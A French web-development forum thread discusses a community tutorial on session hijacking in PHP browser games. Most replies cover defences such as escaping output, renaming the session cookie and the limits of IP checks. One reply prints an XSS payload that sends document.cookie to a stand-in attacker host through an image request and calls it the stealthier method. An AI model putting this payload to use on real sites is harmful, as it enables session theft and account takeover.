+- JeuWeb - Crée ton jeu par navigateur (https://jeuweb.org)
+-- Forum : Discussions, Aide, Ressources... (https://jeuweb.org/forumdisplay.php?fid=38)
+--- Forum : Programmation, infrastructure (https://jeuweb.org/forumdisplay.php?fid=51)
+--- Sujet : Vols de sessions (/showthread.php?tid=782)
Pages :
1
2
Vols de sessions - atra27 - 23-12-2010
Adresse du tuto:
http://wiki.jeuweb.org/securite/vol_de_sessions
Merci de poster vos commentaires ici
C'est mon premier tuto, il est peut étre incomplet ou mal exprimmé. Je suis ouvert aux remarques.
RE: Vols de sessions - ArKeNiS - 23-12-2010
Salut,
Bon tutoriel pour un début.
Mise à part quelques fautes.
En espérant qu'il y ait d'autre point à rajouter sur ce tutoriel
.
RE: Vols de sessions - Amrac - 23-12-2010
Pour la sécurisation par IP, cela ne fonctionne pas pour les téléphones portables.
En effet, il semble que les téléphones changent d'IP, probablement avec le changement d'antenne lorsque l'utilisateur est en mouvement (Dans un bus par exemple).
Cela leur ferait donc des déconnexion intempestives.
RE: Vols de sessions - NicoMSEvent - 23-12-2010
pas mal, pas mal... encore un peu léger, mais il y a de l'idée
Pourquoi pas vérifier via les entêtes aussi les modules, et ce que le navigateur accepte comme l'acceptation de compression? différents formats d'images/sons/videos?) Via javascript tu pourrais aussi vérifier d'autres choses : résolution, nom de la machine, nom de l'utilisateur qui a ouvert une session windows, décalage entre l'horloge système de navigateur et l'horloge du serveur sur lequel est ton site, ... (et envoyer un hash) afin de créer une clé (si pas unique) qui serait souvent différente d'un ordi a l'autre.
RE: Vols de sessions - Jeckel - 23-12-2010
Je rejoins Amrac sur le stockage de l'IP, le même problème peut arriver lorsque l'on est derrière un gros proxy avec plusieurs IP extérieur (c'est mon cas au boulot) sans me déplacer, je change d'IP régulièrement (toutes les 2-3 minutes, quand ce n'est pas toutes les secondes)...
Par contre, la première chose est de renommer son identifiant de session, ne pas garder PHPSESSID qui est trop reconnaissable, par une autre valeur propre à votre application... en plus cela permet d'éviter des conflits si tu as plusieurs applications sur le même nom de domaine.
Enfin, il faut aussi sécuriser son application en amont en interdisant la saisie de HTML pour éviter à un utilisateur de saisir le code malicieux dont tu fais mention.
Voilà, sinon, c'est une très bonne idée ce tuto, bravo
RE: Vols de sessions - php_addict - 23-12-2010
(23-12-2010, 01:58 PM)Amrac a écrit : Pour la sécurisation par IP, cela ne fonctionne pas pour les téléphones portables.
En effet, il semble que les téléphones changent d'IP, probablement avec le changement d'antenne lorsque l'utilisateur est en mouvement (Dans un bus par exemple).
Cela leur ferait donc des déconnexion intempestives.
pas la peine non plus de changer d'endroit pour changer d'ip sur un mobile, sur le mien c'est quasiment 1 IP par changement de page...
RE: Vols de sessions - Sephi-Chan - 23-12-2010
Bonne initiative.
J'ai commencé à retoucher un peu l'article pour le corriger et pour améliorer certains points. Par exemple, j'ai modifié le script de vol par :
<script type="text/javascript">
var image = new Image();
image.src = "http://hacker-website.com/hijack_session.php?".concat(escape(document.cookie));
</script>
C'est une technique bien plus discrète que le document.write !
J'ai également indiqué comment on pouvait éviter ce problème : filtrer (à l'affichage) toutes les données saisies par les utilisateurs grâce à la fonction htmlentities.
Sephi-Chan
RE: Vols de sessions - Anthor - 23-12-2010
Par contre avec l'UTF8 il vaux mieux utiliser htmlspecialchars que de tout convertir et d'en perdre l'utilité.
RE: Vols de sessions - Sephi-Chan - 23-12-2010
Exact ! On s'en fout des é et autres accents… Je change ça tout de suite.
Sephi-Chan
RE: Vols de sessions - atra27 - 23-12-2010
C'est une base, je suis pas pro dans ce domaine.
La preuve j'etais pas au courant de ce changement d'IP des navigateurs mobiles mais en y repensant c'est vrai que le FAI du mobile doit avoir des serveurs qui font la passerelle entre leur réseau et l'internet et donc ils font du load balancing entre les serveurs pour répartir la charge->IP différente.
Et c'est pour ça que j'ai posté sur le wiki: rajoute qui juge utile de rajouter...